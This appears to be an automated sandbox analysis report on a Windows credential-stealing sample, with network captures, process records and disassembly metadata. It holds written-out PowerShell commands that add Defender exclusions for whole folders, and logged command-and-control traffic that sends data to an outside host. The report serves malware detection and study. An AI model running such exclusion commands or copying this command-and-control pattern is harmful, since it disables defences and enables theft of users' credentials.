                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 24 53 f6 a7 97 38 34 ce 25 c8 ea 98 b5 c8 c0 64 d6 c8 8b d4 87 df f3 49 b9 34 39 68 5c 9f 43 e9 46 6c 73 6b d7 af c6 40 a6 ef e6 95 53 9a 2e 19 5e cb 5d 8f e0 92 68 0f c9 70 77 6d c6 67 b5 92 fc dc 99 88 56 e3 d4 ad 68 ee bf 66 c6 d8 50 2d 4a 16 3b e1 02 ef 50 df c5 b3 b3 08 44 7b 1e d4 d6 3a 7b ca 2d cd 00 e3 57 9d 0a 59 12 2c 7b d2 1f 32 c5 61 ba e4 66 57 b7 73 eb 9a 6b 4d f4 c3 08 cd 6f d9 ad d4 87 b7 c8 64 ab fe ab e7 15 95 c7 0d 4b a5 e6 84 0a b7 a4 0f 49 6a 4a a1 03 ec 31 66 74 8b f4 c6 3d 79 51 31 c4 e9 0b 1c 02 69 a1 02 65 86 0d e6 95 12 14 65 f0 dd db c9 83 a7 ec 6c 75 7b 12 e8 ea 38 ae 27 3a 3f 55 39 4b d4 39 ea ae ee a2 c3 b8 09 66 46 85 f7 24 ff a4 d7 2e 4a 64 10 63 53 74 55 6b 3c 5b bd fa ce da d0 bb 5e 0d 4e 8d 70 72 30 a7 95 d1 b9 ea fc 30
                                                                                                        Data Ascii: $S84%dI49h\CFlsk@S.^]hpwmgVhfP-J;PD{:{-WY,{2afWskModKIjJ1ft=yQ1ieelu{8':?U9K9fF$.JdcStUk<[^Npr00
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 1a 95 f3 7b 69 39 e7 c9 52 62 c1 c2 67 e6 26 fd 94 70 d3 c7 d7 17 da b3 ab 97 28 ae 9a c8 ba 33 c6 5b 41 c5 74 5d af 06 89 a1 33 7c 78 76 f0 d8 32 7d 7f 0b 62 7d 09 6d 20 4c e2 70 56 49 a5 f5 ee 7f 06 f3 26 55 58 39 63 bf 4f 0f b3 6c 05 3f bf 0f 08 ad ff 9a 37 bb 1b b3 66 a6 23 f7 be f7 82 ef f6 82 af 13 00 aa 28 b9 38 40 95 97 d2 11 fb 86 2d 38 48 fc 70 1a 52 ab 3c c8 fd 8d 55 1a 07 77 9f 54 ec f8 9c 58 75 3d 4d 48 46 05 cc eb cf 46 3d 80 e6 56 b1 46 e4 bf 82 a4 bc 7d 7e 70 70 88 0f 12 c9 3d 12 50 f9 0d 5d 68 41 16 71 61 bb 7f f5 f0 83 17 1f 4a 96 7e b9 f9 dc c9 12 c4 57 66 bd 53 92 00 9b 0b 85 6f d2 d9 21 8a 87 51 ee 5d 95 49 50 0e 6f 2f 51 3f 47 ad e6 82 d6 00 d8 d4 d4 fe 4d 0b 2e 7f 45 e0 d8 37 8f 0b af 41 0d 3f 2e 81 27 e5 26 e9 72 ff 92 e2 ff 80 a0
                                                                                                        Data Ascii: {i9Rbg&p(3[At]3|xv2}b}m LpVI&UX9cOl?7f#(8@-8HpR<UwTXu=MHFF=VF}~pp=P]hAqaJ~WfSo!Q]IPo/Q?GM.E7A?.'&r
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: a0 49 c0 b5 be c2 b8 e6 ed 68 66 40 ea 95 68 f6 a8 42 2a 09 09 31 c4 48 0f 72 68 a2 de 96 58 f6 87 2b 09 ee a7 04 6a 53 3a 5c 9d 53 fd 38 76 f4 34 55 11 de 30 43 96 9d c4 f9 db 72 b6 16 46 45 bc c9 6b ac 69 6e 48 8f 47 46 82 87 2a c2 61 d3 98 ff 29 48 39 1b 61 ea 39 df bf c5 79 21 96 81 a4 d0 50 4f a5 34 fa de da 90 ed 36 49 f0 e6 31 4c 5d 77 dc 39 1d 3d 87 69 c5 68 6d c3 9f 6e 7d 40 1c 6f e4 ca 46 8b 47 8e 8b 3f e0 07 84 39 99 ff bd c1 ff e7 05 7a ef 4f a5 a0 f9 df 5d e7 a9 0d a8 83 12 c3 96 6f 41 e2 22 6e 37 97 ae fc 2c 4d ce a8 b4 9f 9d 3c 02 5d 00 c9 41 19 9c e9 1c e0 f7 88 0a 24 0d 34 1a 86 61 f3 66 27 33 c7 da 1a c2 3f cd 25 68 24 14 22 4e fc 71 1f 0c cd b8 3c d2 ae 0b dd b2 d0 3c 2e 9d 07 64 0f 98 e0 d7 6d 30 ab 82 29 3a a5 80 06 1b 2f 85 9d b8 42
                                                                                                        Data Ascii: Ihf@hB*1HrhX+jS:\S8v4U0CrFEkinHGF*a)H9a9y!PO46I1L]w9=ihmn}@oFG?9zO]oA"n7,M<]A$4af'3?%h$"Nq<<.dm0):/B
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 02 fe 1e 38 28 f0 45 4c 58 65 db 89 ab f1 b7 9b 11 83 4f b1 c2 66 c2 12 21 73 2a 2a 03 0e ae 8d 24 27 25 17 8c a9 f6 8a db 71 e3 fd 98 65 2f 7e ac 56 33 c3 e4 e9 5a 5d a0 36 f8 2c cf 78 b3 0b 03 6a 1a 28 9b d0 2a 69 6b 46 97 69 cc 0b d7 6f a1 76 4b 19 66 dd 8f af 39 b5 c5 68 98 67 d8 06 6b e9 cf f3 79 1e 2d 3c 26 b3 d7 cc 88 4a 2d 2c 30 fe 3d fc 4f cb 3f 0a 3a e6 1e 15 2b cb 00 bc 06 89 a2 c6 97 0d 7c 20 6d 40 33 ce 9a c2 96 4d 45 8c 7e 7f 2e 0b 60 9c c8 e6 71 c0 4e e8 f0 48 68 ac 98 fa 3d 9e ea f0 3b e8 ec da 52 a6 56 d5 b6 95 90 b2 90 e7 38 38 e3 64 17 89 af f5 91 d2 25 3b d5 9c 5e dd 22 96 ab 03 6c 22 4c 13 b1 19 15 3b fe f2 ff 2f d0 49 3d 44 67 db fd 73 97 3c 35 43 c6 a8 9b 1d 4b d4 cd 31 69 fe 6a 4b 0f 87 e2 e7 b5 b2 f3 59 79 26 36 8a a6 7a c0 70 e9
                                                                                                        Data Ascii: 8(ELXeOf!s**$'%qe/~V3Z]6,xj(*ikFiovKf9hgky-<&J-,0=O?:+| m@3ME~.`qNHh=;RV88d%;^"l"L;/I=Dgs<5CK1ijKYy&6zp
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 83 ac 59 8a 54 a8 eb de 68 e4 f1 04 3c d9 78 ac 83 44 35 93 4b 9b 0f 74 b6 7c 94 90 8b 9b e9 a2 14 db 15 86 da 65 46 38 8c c2 b9 07 44 a3 43 eb 8c 9e 5d 5f dc 09 5e b6 36 99 18 31 82 26 09 35 5a 43 55 86 19 70 02 db da b9 3c 49 3c 4b dc 11 1b 6a 98 49 3e 9d c1 42 5e 7f 3c 1f 0f 06 08 6d 01 f4 b2 b7 4b 07 3c 04 68 ce da 8e ce 45 a4 e4 e0 6d 50 ed 33 14 15 36 99 3e c2 62 87 f5 05 5b 71 9e e8 0a 91 be 96 48 9c eb 32 17 a6 e1 fc 71 4f ea 64 68 11 fe 84 f5 9b 7b f1 c9 21 a5 02 e3 51 73 f3 39 a6 ba b5 01 82 1c c4 e4 49 51 e9 74 93 06 3f a4 9f e0 56 39 4b fe e7 9d 52 6b c3 7e e7 78 ec 89 87 c8 5f 29 36 eb d0 7b ee 63 53 a1 f9 58 4e 1e dd 72 eb 16 05 6c 04 bf 8c d3 b8 19 cf 1b f7 a2 cb 73 2b 77 cb ea 5c ef af 08 9e ed a1 af 7d 66 2a f8 71 fc 46 98 1c c7 17 5f 1d
                                                                                                        Data Ascii: YTh<xD5Kt|eF8DC]_^61&5ZCUp<I<KjI>B^<mK<hEmP36>b[qH2qOdh{!Qs9IQt?V9KRk~x_)6{cSXNrls+w\}f*qF_
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 52 bc 17 f1 0e c6 2d a6 7a 4d af 7f a5 d4 a4 94 42 3b d4 bd fd 45 15 07 9d f5 c4 32 9f 4a 7a 66 51 0c 49 3c 34 01 47 77 5d 3a 96 01 d2 70 1d 7a a8 bc 4d b8 f3 57 cb 3d e1 f2 f5 7f cf c3 4b ce 08 a2 99 12 a0 bb 86 f0 d6 f3 3f 13 d4 88 62 04 31 4a d8 35 a7 1c d9 2b 52 75 90 46 48 46 e4 dd c3 3d 22 6f 84 4b 80 81 4a 8a c0 32 60 61 d9 6f 06 62 7c 1e 54 64 2d 6a 35 10 7c 04 7b bc d0 b1 46 5e 69 38 3b 0f 6e bf ba df 6b 53 19 e1 5a 2c d8 1b 5d 57 15 7f 03 8e 88 85 bf ac a9 11 fd 74 ae 7d 8e 69 1a 43 da ab 89 4e 9a a3 c8 35 7b d8 2f 1c d3 40 49 04 17 cb 7e c1 d2 6e 95 4e 02 25 e5 ac e3 0f 45 e9 74 44 52 1b 15 37 33 cc 68 7b 94 af fd 29 48 3e cc 65 c7 dd ff a6 14 0b 6f e0 06 3e 5f 87 83 39 8a d1 75 f4 f1 95 05 b7 97 0e aa f5 43 6a 06 bc 92 4c 57 13 3a 49 cb 3b 61
                                                                                                        Data Ascii: R-zMB;E2JzfQI<4Gw]:pzMW=K?b1J5+RuFHF="oKJ2`aob|Td-j5|{F^i8;nkSZ,]Wt}iCN5{/@I~nN%EtDR73h{)H>eo>_9uCjLW:I;a
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 43 59 22 3f 2f 2b 5d 7d 44 8a 6b 46 20 aa a5 e8 4a e6 74 95 2a 48 5f c2 82 82 1d 8a 3a 99 bc fb a9 89 04 0a 17 31 88 ac 0f 19 fa 20 19 b7 df 6f 6a f9 63 0c 4e da 2a f7 33 fd fb 8e 4f 7f ea ad d6 a5 1c df f5 fd bc c5 97 74 23 2d 75 b1 f8 80 87 cf d7 9b 37 a5 16 6a a6 7e 1d e0 99 70 d1 b4 66 99 6e 7e 70 2e ba d1 b7 5b 15 3f ab ab 35 64 12 7e 64 18 10 6a b3 db 7f 8e 8d 0a 9a bb a1 c9 3b 40 ad 7f 74 94 4f 90 7b 31 6e b1 b2 b0 0a 0d 7f 3b f8 df 3f 74 6d 67 91 4c 8e 37 3f 10 c3 a6 c0 f5 79 55 df 89 71 3c ca 6d 35 b1 03 1c 3d c8 c5 72 36 52 8a cf 1d a6 e9 20 71 8b 45 98 1d cf d8 47 a2 6f c6 52 f6 cd 1e 3e 9b e3 47 7f d9 62 35 4e e5 c8 83 b4 4f 4a 99 90 43 34 e5 dd 27 69 5c ea b7 3a 01 76 60 5d 76 16 cb 63 81 72 0b 27 9a f2 ce 05 50 9f 60 3c 5d 27 95 2e 35 ba f3
                                                                                                        Data Ascii: CY"?/+]}DkF Jt*H_:1 ojcN*3Ot#-u7j~pfn~p.[?5d~dj;@tO{1n;?tmgL7?yUq<m5=r6R qEGoR>Gb5NOJC4'i\:v`]vcr'P`<]'.5
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: c5 17 f6 36 62 40 f9 21 95 80 be 6f a0 48 91 2b 2f 04 2e b4 4b e1 e0 8c 33 c0 77 2b 70 c1 ae f6 42 d4 da aa e0 f3 78 e0 df 0c 55 06 9f 17 e2 6f cb f6 d0 43 e3 02 40 d1 ec 9f 2d 6f db 1c b1 6c 67 2c 9f 30 37 f5 21 2e ba d4 5b 83 9b f3 30 e3 77 0d 19 23 43 10 c9 64 9f dd 2a a5 d0 17 fd 16 69 ea b6 71 df 4d 33 7f 55 d0 71 e2 23 d0 5c fb 0f e9 a4 37 3d 5e 3a 3b b9 27 f7 ab 54 87 db aa d4 c1 8c 0f ad 61 4e f1 cb 53 d2 4a 04 14 21 bf ee 93 b4 32 25 49 a4 84 73 c6 2c e5 fb 0e 31 4f 56 9b b4 92 b0 1d 4c cd 17 61 cc 3e a6 b8 7a 11 ed 98 16 0a 10 a8 5b 1d 25 13 e8 44 6a b2 4e 0a 20 39 91 8a 92 6b 8d 93 5c 1a d7 6b 36 c8 b8 5e 56 3f f4 06 0f 91 e5 19 e3 4b c3 c6 2d 6f 1a bc 09 40 3e 61 b9 e1 24 31 63 3e f7 cd a0 13 77 e8 b1 22 85 62 e3 9c 65 cb b8 a8 ea 72 c3 e2 82
                                                                                                        Data Ascii: 6b@!oH+/.K3w+pBxUoC@-olg,07!.[0w#Cd*iqM3Uq#\7=^:;'TaNSJ!2%Is,1OVLa>z[%DjN 9k\k6^V?K-o@>a$1c>w"ber
                                                                                                        2024-12-27 12:11:25 UTC1135INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:25 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=betv58ja80vq9ug848n0me1g0h; expires=Tue, 22 Apr 2025 05:58:04 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4G8nxA8CyJ6F6Tdwjii%2BCVtyq%2F%2BhCogGxdxXV29BcLBwVf%2BRSbQBN8WjyUOdh7JO0bYRoZIDaV3X2l%2BVpn2osVPZxKF9HtrXVT2tGtBfqm98pyVsqEuu53X3hGu1DYQ54hs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f89367a89d24358-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6856&min_rtt=6856&rtt_var=3428&sent=208&recv=611&lost=0&retrans=1&sent_bytes=4214&recv_bytes=591562&delivery_rate=141781&cwnd=206&unsent_bytes=0&cid=222e11185ba746cc&ts=3302&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        9192.168.2.549744172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:27 UTC263OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 77
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:27 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=nbYRKl--&j=&hwid=FE2FA5131359532BBEBA0C6A975F1733
                                                                                                        2024-12-27 12:11:28 UTC1126INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:27 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=f8sh7ndnnqq3sft7fupalgp8nl; expires=Tue, 22 Apr 2025 05:58:06 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khw5LxGLq%2Fe3G66Nf4FdKXNCdXw9j8mW8DiUzHZRxF0X23td1fic9ShT5IDqzoQkiHTPUkmHyKyILpmKYChilIUa0CQdEroIUcs%2F9afF8Qp2cDWBwtuiqE%2Fq%2FZ4WZehkh7I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f893697bcd44386-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2083&rtt_var=822&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=976&delivery_rate=1298932&cwnd=246&unsent_bytes=0&cid=75c52ee6e60ff5a2&ts=1058&x=0"
                                                                                                        2024-12-27 12:11:28 UTC54INData Raw: 33 30 0d 0a 62 31 69 50 2f 38 72 71 6c 42 41 62 35 4f 69 78 51 2b 72 35 73 65 69 6f 57 72 71 4f 55 31 61 4a 74 39 2f 59 46 53 34 6b 53 50 38 30 42 51 3d 3d 0d 0a
                                                                                                        Data Ascii: 30b1iP/8rqlBAb5OixQ+r5seioWrqOU1aJt9/YFS4kSP80BQ==
                                                                                                        2024-12-27 12:11:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:07:10:52
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Users\user\Desktop\OiMp3TH.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\OiMp3TH.exe"
                                                                                                        Imagebase:0xf30000
                                                                                                        File size:94'720 bytes
                                                                                                        MD5 hash:AB408F4EB577EDA6D98941EDE1B44863
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:07:10:53
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                                                                                                        Imagebase:0x780000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:07:10:53
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:07:10:56
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                        Imagebase:0x780000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:07:10:56
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:07:11:05
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\nhrhvnf\ghhqoznpon_638708802577261661.exe"
                                                                                                        Imagebase:0xea0000
                                                                                                        File size:1'282'560 bytes
                                                                                                        MD5 hash:2A64267B616C528EE9618165671CCA9A
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Executed Functions

                                                                                                          Function 030836C0 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (aq$(aq
                                                                                                          • API String ID: 0-3916115647
                                                                                                          • Opcode ID: 9ea7a7e7b40e3a1b509ca94c6633e0fb2166bf539274d82052bfd64f17fdb1ce
                                                                                                          • Instruction ID: 888aa0e4802072e9152a05451969ef60946d316ec71899f29297b286177e8415
                                                                                                          • Opcode Fuzzy Hash: 9ea7a7e7b40e3a1b509ca94c6633e0fb2166bf539274d82052bfd64f17fdb1ce
                                                                                                          • Instruction Fuzzy Hash: 7BB18F78B012058FCB14EBACD49066EB7F6EFC8710B1485AAD886DB355DB74ED02CB91
                                                                                                          Function 03084508 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: d
                                                                                                          • API String ID: 0-2564639436
                                                                                                          • Opcode ID: 6922ba2055a89e7fd0ddac3eecfbc262c5e796ffc55e1f15c096e53774682770
                                                                                                          • Instruction ID: 85f5f57ecfc7ede0bf67a111ac6cc9f5c5c99bcf0d3293cc62c2a0150604ccd0
                                                                                                          • Opcode Fuzzy Hash: 6922ba2055a89e7fd0ddac3eecfbc262c5e796ffc55e1f15c096e53774682770
                                                                                                          • Instruction Fuzzy Hash: D3D10231A016168FCB14EF59C48096AFBF5FF85320B19C6AAD8A9DB681D730FC51CB90
                                                                                                          Function 03084038 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s
                                                                                                          • API String ID: 0-2660418068
                                                                                                          • Opcode ID: 3bdd7ed24879451a96835826b4572e4c2c48566d3c74d08e0cbb47777835facb
                                                                                                          • Instruction ID: 5938ddbb2d465f0e17d44a410bc7b9c3b6044a042cbd8ddce3744d3ae2fe5359
                                                                                                          • Opcode Fuzzy Hash: 3bdd7ed24879451a96835826b4572e4c2c48566d3c74d08e0cbb47777835facb
                                                                                                          • Instruction Fuzzy Hash: 1F419EB4E012199FCB44DFA9E984ADEBBF1FB89301F10856AE814A7350D7346E45CF91
                                                                                                          Function 03084048 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: s
                                                                                                          • API String ID: 0-2660418068
                                                                                                          • Opcode ID: 86ba59d48037b63fe11451bbe06257f55e9ffae6725792f2c49b36e818bc08b5
                                                                                                          • Instruction ID: 6bda189b8d20b72ba16c6c81bff3be3b6869154a33490784a11f5b13a17f443a
                                                                                                          • Opcode Fuzzy Hash: 86ba59d48037b63fe11451bbe06257f55e9ffae6725792f2c49b36e818bc08b5
                                                                                                          • Instruction Fuzzy Hash: 54417FB8E012199FCB44DFA9E984ADEBBF1FB89311F10852AE814A7340D7346E45CF90
                                                                                                          Function 03080CD0 Relevance: .3, Instructions: 279COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1d8982c1e42b0903d4783ac04059154bbdde055cc42af0ef6a1e834caeccbf21
                                                                                                          • Instruction ID: 2dc626c29c711731d1356b7c6f2a5d7f5b03a0a8075f804e0f017182944ce10c
                                                                                                          • Opcode Fuzzy Hash: 1d8982c1e42b0903d4783ac04059154bbdde055cc42af0ef6a1e834caeccbf21
                                                                                                          • Instruction Fuzzy Hash: 3BD1D074A022288FCB69EF29D998BDDB7F5BB89701F1080E9D809A3254DB305F81CF55
                                                                                                          Function 03081EC9 Relevance: .3, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dcde9f070badeb5db2d0ed5a8569953a6d476a5f3a38b0290a862a4e116dd8ed
                                                                                                          • Instruction ID: cf83bc678b8cacb9191ac3b7a7c06bacaf55cd039a2ac91d93a6d947bd44c009
                                                                                                          • Opcode Fuzzy Hash: dcde9f070badeb5db2d0ed5a8569953a6d476a5f3a38b0290a862a4e116dd8ed
                                                                                                          • Instruction Fuzzy Hash: 25D18174A01229CFCB65EF28E9A8A9DB7B5FB89700F1081E9D90DA3354DB305E81CF55
                                                                                                          Function 03084DF8 Relevance: .2, Instructions: 204COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.4461139642.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3080000_OiMp3TH.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd4166616da82eb57dda1c58245f52058ca69da73b3c7e9e4710a3644e22c4e7
                                                                                                          • Instruction ID: 0ac7ba70acdd62afd1dbeec62570f2ab4da6540a5961e8a76eccfcf14884fa39
                                                                                                          • Opcode Fuzzy Hash: bd4166616da82eb57dda1c58245f52058ca69da73b3c7e9e4710a3644e22c4e7
                                                                                                          • Instruction Fuzzy Hash: 2D819630A01206CFCF14DFA9D884AAEBBB2FF88310F148559E945AB355DB34E941CF91
                                                                                                          Function 030811D2 Relevance: .2, Instructions: 155COMMON
                                                                                                          Download Yara Rule
